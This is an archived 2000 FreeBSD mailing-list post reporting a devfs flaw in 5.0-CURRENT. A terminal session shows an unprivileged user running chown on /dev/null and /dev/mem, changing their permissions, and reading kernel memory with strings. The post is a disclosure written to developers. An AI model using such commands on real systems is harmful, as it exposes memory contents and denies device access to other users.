Date: Fri, 15 Sep 2000 13:55:48 +0200 From: Alain Thivillon <Alain.Thivillon@hsc.fr> To: freebsd-current@freebsd.org Subject: DevFs status and security ? Message-ID: <20000915135548.A436@yoko.hsc.fr>
next in thread | raw e-mail | index | archive | help
There is a huge security hole in -CURRENT devfs, i don't known if this is a temporary issue or a 'real' bug: $ id uid=2089(yann) gid=2089(yann) groups=2089(yann) $ uname -a FreeBSD yoko.hsc.fr 5.0-CURRENT FreeBSD 5.0-CURRENT #57: Fri Sep 15 13:36:26 CEST 2000 titi@yoko.hsc.fr:/usr/src/sys/compile/YOKO50 i386 $ df Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad0s3a 6252604 5027631 724765 87% / devfs 1 1 0 100% /dev procfs 4 4 0 100% /proc $ ls -l /dev/null crw-rw-rw- 1 root wheel 2, 2 Sep 15 13:47 /dev/null $ chown yann /dev/null $ chown yann /dev/mem $ ls -l /dev/null crw-rw-rw- 1 yann wheel 2, 2 Sep 15 13:47 /dev/null $ chmod 600 /dev/null $ ls -l /dev/null crw------- 1 yann wheel 2, 2 Sep 15 13:47 /dev/null $ strings /dev/mem | head -10 Read Boot error (TKT ( CT (@;T ((0S (,/S (l-S (d/S Every user can change all owners and perms on devfs files. I have verified that /dev/null permissions are REALLY changed (other users can not use him) and that Mem can REALLY be read by anyone. Did i miss something ? Strange that nobody reported it (my problems appeeared when procmail changed perms of /dev/null :)) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-current" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20000915135548.A436>